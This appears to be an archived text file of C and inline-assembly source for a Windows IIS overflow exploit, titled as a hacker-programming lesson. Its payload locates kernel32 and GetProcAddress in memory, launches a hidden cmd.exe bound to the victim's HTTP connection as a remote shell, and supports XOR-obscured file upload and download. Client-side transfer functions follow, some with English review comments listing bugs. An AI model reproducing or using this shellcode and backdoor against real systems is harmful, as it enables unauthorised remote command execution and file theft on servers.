📄 windows下强大功能的溢出程序源代码.txt

📁 可以对黑客编程有一定的了解
    FARPROC     ReadFileadd;
    FARPROC     PeekNamedPipeadd;
    FARPROC     CloseHandleadd;
    FARPROC     CreateProcessadd;
    FARPROC     CreatePipeadd;
    
    FARPROC    procloadlib;
    FARPROC     apifnadd[1];
    FARPROC     procgetadd=0;
    FARPROC     writeclient= *(int *)(ecb+0x84);
    FARPROC     readclient = *(int *)(ecb+0x88);
    HCONN       ConnID     = *(int *)(ecb+8) ;
    char        *stradd;
    int         imgbase,fnbase,i,k,l;
    HANDLE      libhandle,fpt;   //libwsock32;  
    STARTUPINFO siinfo;

    PROCESS_INFORMATION ProcessInformation;
    HANDLE   hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
    int         lBytesRead;
    int  lockintvar1,lockintvar2;
    char lockcharvar;
    SECURITY_ATTRIBUTES sa;

    _asm {
                      jmp    nextcall
         getstradd:   pop    stradd
              lea    EDI,except
              mov    eax,dword ptr FS:[0]
              mov    dword ptr [edi+0x08],eax
              mov    dword ptr FS:[0],EDI
    }

    except[0]=0xffffffff;
    except[1]=stradd-0x07;

    imgbase=0x77e00000;
    _asm{
      call getexceptretadd
    }
    for(;imgbase<0xbffa0000,procgetadd==0;){
    imgbase+=0x10000;
    if(imgbase==0x78000000) imgbase=0xbff00000;
        if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
       fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
       k=*(int *)(fnbase+0xc)+imgbase;
       if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
         libhandle=imgbase;
         k=imgbase+*(int *)(fnbase+0x20);
         for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
            if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
              k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
          k+=*(int *)(fnbase+0x10)-1;
          k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
          procgetadd=k+imgbase;
          break;
        }
        }
      }
    }
   }
// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
// 注意这儿处理了搜索页面不在情况。

   _asm{
       lea edi,except
           mov eax,dword ptr [edi+0x08]   
       mov dword ptr fs:[0],eax
   }
       
   if(procgetadd==0) goto  die ;

   for(k=1;k<SHELLFNNUMS;++k){
         apifnadd[k]=procgetadd(libhandle,stradd);
     for(;;++stradd){
            if(*(stradd)==0&&*(stradd+1)!=0) break;
         }
         ++stradd;
   }

   sa.nLength=12;
   sa.lpSecurityDescriptor=0;
   sa.bInheritHandle=TRUE;

   CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
   CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);

// ZeroMemory(&siinfo,sizeof(siinfo));
   _asm{
            lea EDI,siinfo
            xor eax,eax
            mov ecx,0x11
            repnz stosd
   }
   siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
   siinfo.wShowWindow = SW_HIDE;
   siinfo.hStdInput = hReadPipe2;
   siinfo.hStdOutput=hWritePipe1;
   siinfo.hStdError =hWritePipe1;
// k=0;
// while(k==0){
   k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
   stradd+=8;
// }    
   PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);

   k=8;
   writeclient(ConnID,stradd+9,&k,0);

   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;

   while(1){
        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
    if(lBytesRead>0){
            ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
            if(lBytesRead>0){
             for(k=0;k<lBytesRead;++k){
                     lockintvar2=lockintvar2*0x100;
             lockintvar2=lockintvar2%LOCKBIGNUM;
             lockcharvar=lockintvar2%0x100;
                     Buff[k]^=lockcharvar;
              }
          writeclient(ConnID,Buff,&lBytesRead,0);
            } 
    }
    else{
              lBytesRead=SHELLBUFFSIZE;
            l=0;
          while(l==0){
                k=readclient(ConnID,Buff,&lBytesRead);
                   for(l=0;l<lBytesRead;++l){
                         lockintvar1=lockintvar1*0x100;
                 lockintvar1=lockintvar1%LOCKBIGNUM;
                 lockcharvar=lockintvar1%0x100;
                         Buff[l]^=lockcharvar;
           }
                if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){
                 l=*(int *)(Buff+4);
//                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); 
             

fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0)

;
                         k=GetLastErroradd();
             i=0;
             while(l>0){
                              k=readclient(ConnID,Buff,&lBytesRead);
                              if(k==1){
                   if(lBytesRead>0){
                                      for(k=0;k<lBytesRead;++k){
                                          lockintvar1=lockintvar1*0x100;
                                     lockintvar1=lockintvar1%LOCKBIGNUM;
                                  lockcharvar=lockintvar1%0x100;
                                          Buff[k]^=lockcharvar;
                            }
                                   l-=lBytesRead;
                       WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); 
                                   }
                  }
                  else{
                         Sleepadd(0100);
                                    ++i;
                    } 
                  if(i>10000) l=0;
             }
                        CloseHandleadd(fpt);
                 l=0;
           }
           else{
               if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){                    

fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); 
                            Sleepadd(100);
                l=GetFileSizeadd(fpt,&k);
                *(int *)Buff='ezis';        //size
                *(int *)(Buff+4)=l;
                lBytesRead=8;
                            for(i=0;i<lBytesRead;++i){
                                lockintvar2=lockintvar2*0x100;
                               lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                                Buff[i]^=lockcharvar;
                }
                            writeclient(ConnID,Buff,&lBytesRead,0);
                      //    Sleepadd(100);
                i=0;
                while(l>0){
                  k=SHELLBUFFSIZE; 
                                  ReadFileadd(fpt,Buff,k,&k,0);
                  if(k>0){
                                      for(i=0;i<k;++i){
                                        lockintvar2=lockintvar2*0x100;
                              lockintvar2=lockintvar2%LOCKBIGNUM;
                            lockcharvar=lockintvar2%0x100;
                                        Buff[i]^=lockcharvar;
                        }
                              i=0;
                                      l-=k;
                             writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
//                                    Sleepadd(100);               
                                }
                    else ++i;
                    if(i>100) l=0;
              }
              CloseHandleadd(fpt);
                    l=0;
             }
             else l=1;
         }
       }

           if(k!=1){
                k=8;
            WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
            WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
            while(1){
                        Sleepadd(0x7fffffff);                  //僵死  
           }    
            
       }
       else{
                WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
//             Sleepadd(1000);
      }
      }
  }

  die: goto die  ;

      _asm{

getexceptretadd:   pop  eax
           push eax
           mov  edi,dword ptr [stradd]
           mov dword ptr [edi-0x0e],eax
           ret
errprogram:       mov eax,dword ptr [esp+0x0c]
           add eax,0xb8
           mov dword ptr [eax],0x11223344  //stradd-0xe
           xor eax,eax        //2
           ret            //1
execptprogram:     jmp errprogram    //2 bytes stradd-7
nextcall:          call getstradd    //5 bytes
           NOP
           NOP
           NOP
           NOP
           NOP
           NOP
           NOP
           NOP
           NOP
       }        

}




/*
 * cleanchkesp - neutralise calls to one routine inside a code buffer, in place.
 *
 * shellbuff holds len bytes of machine code that was compiled as if it were
 * located at fnadd; chkesp is the address of the routine whose calls must go.
 * (The name suggests the MSVC debug-build stack check `_chkesp`, which the
 * compiler inserts at function exit; a buffer that is copied elsewhere cannot
 * reach it through a relative call — presumably the reason for this pass.)
 *
 * Every byte equal to 0xE8 is treated as an x86 `call rel32`: the 32-bit
 * displacement after it is read and the call target is computed as
 * fnadd + rel32 + i + 5, i.e. the address the call would land on if the buffer
 * were still at fnadd. A call resolving to chkesp is overwritten by five bytes
 * that change no state (nop, inc ebx, dec ebx, inc ebx, dec ebx), so the buffer
 * length and every other relative offset are left exactly as they were.
 *
 * NOTE(review): neither the displacement read at shellbuff+i+1 nor the 5-byte
 * patch is bounded by len, so a 0xE8 within the last four bytes reads (and may
 * write) past the buffer. The scan also does not skip the four operand bytes of
 * a matched call, so an operand byte equal to 0xE8 is examined again as an
 * opcode. The `*(int *)` read is an unaligned access on a char buffer.
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{ 
   int i,k;
   unsigned char temp;     /* unsigned so the comparison with 0xe8 is not sign-extended */
   char *calladd;

   for(i=0;i<len;++i){
       temp=shellbuff[i];
       if(temp==0xe8){                         /* x86 near call opcode */
         k=*(int *)(shellbuff+i+1);            /* rel32 operand, relative to end of the 5-byte call */
         calladd=fnadd;
         calladd+=k;
         calladd+=i;
         calladd+=5;                           /* target = fnadd + rel32 + (offset of next instruction) */
         if(calladd==chkesp){
             shellbuff[i]=0x90;                /* nop */
             shellbuff[i+1]=0x43;   // inc ebx
                    shellbuff[i+2]=0x4b;    // dec ebx
             shellbuff[i+3]=0x43;              /* inc ebx */
             shellbuff[i+4]=0x4b;              /* dec ebx: net effect on ebx is zero */
         }
       }
   }
}




/*
 * iisput - client side of the "put" transfer: send a local file to the remote end.
 *
 * fd  : connected socket; the peer is the loop that parses "put " records.
 * str : command tail of the form "<localname> [<remotename>]". It is modified
 *       in place: the space ending each name is overwritten with NUL.
 *
 * Record sent through newsend (which XORs every byte with the session
 * keystream before send()):
 *   bytes 0..3  "put "
 *   bytes 4..7  file size as a native-endian int (low 32 bits only)
 *   bytes 8..   remote name, NUL-terminated
 * followed by the raw file contents in chunks of at most 0x800 bytes.
 *
 * NOTE(review):
 *  - `filename=="\x0"` compares the pointer with a second string literal; it
 *    only matches the "\0" assigned above if the compiler merges identical
 *    literals, so the usage message may never be printed.
 *  - fpt is declared FILE* but receives a CreateFile HANDLE, and the result is
 *    not checked for INVALID_HANDLE_VALUE before GetFileSize/ReadFile.
 *  - the first record is sent with length i+0x9, where i is the parse position
 *    in str rather than strlen(filename2)+9; looks like that always covers the
 *    NUL but also sends trailing uninitialised bytes of buff — confirm.
 *  - the transfer loop exits only when filesize reaches 0; a ReadFile that
 *    returns size==0 or fails leaves it spinning.
 */
void iisput(int fd,char *str){

char *filename;                 /* start of the local name inside str */
char *filename2;                /* start of the remote name; defaults to filename */
FILE *fpt;                      /* NOTE(review): actually holds a HANDLE, see header */
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;

filename="\0";
filename2="\0";
j=strlen(str);
/* pass 1: skip leading spaces, the first non-space starts filename */
for(i=0;i<j;++i,++str){
     if(*str!=' '){
     filename=str;
         break;
     } 
}
/* pass 2: terminate filename at the next space */
for(;i<j;++i,++str){
      if(*str==' ') {
     *str=0;
     break;
     }
}
++i;
++str;
/* passes 3 and 4: same for the optional second name */
for(;i<j;++i,++str){
       if(*str!=' '){
       filename2=str;
       break;
     }
}
for(;i<j;++i,++str){
      if(*str==' ') {
      *str=0;
      break;
     }
}

if(filename=="\x0") {            /* NOTE(review): pointer comparison, see header */
     printf("\n iisput filename [path\\fiename]\n");     
     return;
}
if(filename2=="\x0") filename2=filename;

printf("\n begin put file:%s",filename);

j=0;
ioctlsocket(fd, FIONBIO, &j);   /* FIONBIO with 0: blocking socket for the transfer */


Sleep(1000);

fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);   /* unchecked */
filesize=GetFileSize(fpt,&filesizehigh);     /* high dword is fetched but never used or sent */
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;                   /* native int; the peer reads it back as *(int *)(Buff+4) */
filesize=*(int *)(buff+4);                   /* reloads the value just stored; no effect */
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);                    /* NOTE(review): length is parse index + 9, see header */
printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);

/* stream the file; each chunk is XOR-encoded by newsend before it goes out */
while(filesize>0){
      size=0x800;
      ReadFile(fpt,buff,size,&size,NULL);    /* size is both the request and the byte count read */
      if(size>0){
          newsend(fd,buff,size,0);
//          Sleep(0100);
          filesize-=size;
      }
}                                            /* NOTE(review): no exit path when size<=0 */

CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);   /* back to non-blocking */

printf("\n put file ok!\n");
Sleep(1000);

}



/*
 * iisget - client side of the "get" transfer: fetch a remote file into a local one.
 *
 * fd  : connected socket; the peer is the loop that parses "get " records.
 * str : command tail "<remotename> [<localname>]", modified in place exactly as
 *       in iisput (each name is NUL-terminated at the following space).
 *
 * Sends "get " + remote name through newsend, then polls newrecv until a reply
 * starts with "size" followed by the file size as a native int (the peer stores
 * the multi-char constant 'ezis', which reads as "size" in little-endian memory).
 * Any other reply is printed as "recv ..." and the wait restarts. Bytes after the
 * 8-byte header of that reply are already file data and are written out before
 * the main receive loop.
 *
 * NOTE(review):
 *  - same pointer-vs-literal comparison `filename=="\x0"` as iisput.
 *  - fpt is declared FILE* but holds a CreateFileA HANDLE; it is never checked
 *    before WriteFile.
 *  - the "get " record is sent with length i+0x5 where i is the parse position
 *    in str, not strlen(filename2)+5 — confirm it is what the peer expects.
 *  - in the receive loop, size==0 (peer closed) prints a message but neither
 *    breaks nor changes filesize, so an early close spins forever.
 *  - the wait loop's `else ++j` only fires when newrecv returns <=0; with the
 *    socket in blocking mode that means close or error, not "no data yet".
 */
void iisget(int fd,char *str){

char *filename;                 /* start of the remote name inside str */
char *filename2;                /* start of the local name; defaults to filename */
FILE *fpt;                      /* NOTE(review): actually holds a HANDLE, see header */
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;

filename="\0";
filename2="\0";
j=strlen(str);
/* pass 1: skip leading spaces, the first non-space starts filename */
for(i=0;i<j;++i,++str){
     if(*str!=' '){
     filename=str;
         break;
     } 
}
/* pass 2: terminate filename at the next space */
for(;i<j;++i,++str){
      if(*str==' ') {
     *str=0;
     break;
     }
}
++i;
++str;
/* passes 3 and 4: same for the optional second name */
for(;i<j;++i,++str){
      if(*str!=' '){
      filename2=str;
          break;
     }
}
for(;i<j;++i,++str){
     if(*str==' ') {
      *str=0;
      break;
     }
}


if(filename=="\x0") {            /* NOTE(review): pointer comparison, see header */
     printf("\n iisget filename [path\\fiename]\n");     
     return;
}
if(filename2=="\x0") filename2=filename;

printf("\n begin get file:%s",filename);

fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);   /* unchecked */
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);                    /* NOTE(review): length is parse index + 5, see header */
printf("\n get file:%s from file:%s",filename,filename2);

j=0;
ioctlsocket(fd, FIONBIO, &j);   /* FIONBIO with 0: blocking socket for the transfer */

i=0;
filesize=0;

/* wait for the "size" reply; j counts consecutive empty/failed receives */
j=0;
while(j<100){
//  Sleep(100);
    i=newrecv(fd,buff,0x800,0);
    if(i>0){
    buff[i]=0;                               /* terminate so the reply can be printed as a string */
    if(memcmp(buff,"size",4)==0){
          filesize=*(int *)(buff+4);         /* native int written by the peer after 'ezis' */
            j=100;                           /* leave the wait loop */
        }
    else {
        j=0;
        printf("\n recv %s",buff);           /* unrelated output from the peer; keep waiting */
    }
    }
    else ++j;
// if(j>1000) i=0;
}

printf("\n file %d bytes %d\n",filesize,i);
/* file data that arrived in the same receive as the 8-byte header */
if(i>8){
       i-=8;
       WriteFile(fpt,buff+8,i,&i,NULL);
       filesize-=i;
}

while(filesize>0){
      size=newrecv(fd,buff,0x800,0);         /* newrecv strips the XOR keystream in place */
          if(size>0){
             WriteFile(fpt,buff,size,&size,NULL); 
             filesize-=size;
      }
      else {
           if(size==0) {
                  printf("\n ftp close \n ");   /* NOTE(review): no break here, see header */
             }
           else {
          printf("\n Sleep(100)");
          Sleep(100);
               }
          }

}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);   /* back to non-blocking */
}

/*
 * newrecv - recv() wrapper that removes the session XOR keystream in place.
 *
 * Returns exactly what recv() returned: the byte count, 0 on close, or the
 * error value. Decoding is only applied once the file-scope flag xordatabegin
 * equals 1. The keystream state (lockintvar1 / lockcharvar, modulus LOCKBIGNUM)
 * is file-scope and advances one step per received byte, so callers must
 * consume the stream in wire order or the two ends fall out of sync.
 *
 * NOTE(review): this is a fixed arithmetic sequence, not a keyed cipher — the
 * bytes are hidden from casual inspection only; anyone holding the constants
 * can regenerate the stream. The seed is presumably set elsewhere; confirm.
 */
int newrecv(int fd,char *buff,int size,int flag)
{
    int got;
    int pos;

    got = recv(fd, buff, size, flag);
    if (xordatabegin != 1) {
        return got;                 /* before the handshake, bytes pass through untouched */
    }

    /* a zero or negative result from recv() runs this loop zero times */
    for (pos = 0; pos < got; ++pos) {
        lockintvar1 = lockintvar1 * 0x100;
        lockintvar1 = lockintvar1 % LOCKBIGNUM;
        lockcharvar = lockintvar1 % 0x100;   /* next key byte */
        buff[pos] ^= lockcharvar;
    }
    return got;
}

/*
 * newsend - send() wrapper that applies the session XOR keystream in place.
 *
 * Encodes the first size bytes of buff with the file-scope send-side state
 * (lockintvar2 / lockcharvar, modulus LOCKBIGNUM), one keystream step per byte,
 * then hands the buffer to send() and returns its result. The caller's buffer
 * is overwritten: after return it holds the encoded bytes, not the original.
 * For size <= 0 nothing is touched and send() is still called with that size.
 *
 * NOTE(review): same deterministic, unkeyed transform as newrecv; the two sides
 * stay in sync only if every byte sent here is decoded exactly once by the peer.
 */
int newsend(int fd,char *buff,int size,int flag)
{
    char *cur;
    char *end;

    if (size > 0) {
        end = buff + size;
        for (cur = buff; cur != end; ++cur) {
            lockintvar2 = lockintvar2 * 0x100;
            lockintvar2 = lockintvar2 % LOCKBIGNUM;
            lockcharvar = lockintvar2 % 0x100;   /* next key byte */
            *cur ^= lockcharvar;
        }
    }
    return send(fd, buff, size, flag);
}
